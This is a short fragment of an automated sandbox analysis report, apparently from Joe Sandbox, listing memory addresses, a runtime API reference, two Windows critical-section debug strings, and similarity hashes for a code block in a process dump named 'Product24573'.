                                          0x0118fe1e
                                          0x0118fe19
                                          0x0118fe19
                                          0x0118fe19
                                          0x0118fe20
                                          0x0118fe21
                                          0x0118fe22
                                          0x0118fe25
                                          0x0118fe40

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0118FDFA
                                          Strings
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0118FE01
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0118FE2B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: e2b2c89bc2014b3467e84a41d8ba2ff1bb085cfb004f290848ab057f7e37f466
                                          • Instruction ID: d8d5e9d6ada17add073b576901c79600c4b7c46a0044c55ffe63ada201f2b5e6
                                          • Opcode Fuzzy Hash: e2b2c89bc2014b3467e84a41d8ba2ff1bb085cfb004f290848ab057f7e37f466
                                          • Instruction Fuzzy Hash: A2F0FC32100512BFD6282A46DC06F23BF5BDB44770F158315F654551D1DB62F87086F0
                                          Uniqueness

                                          Uniqueness Score: -1.00%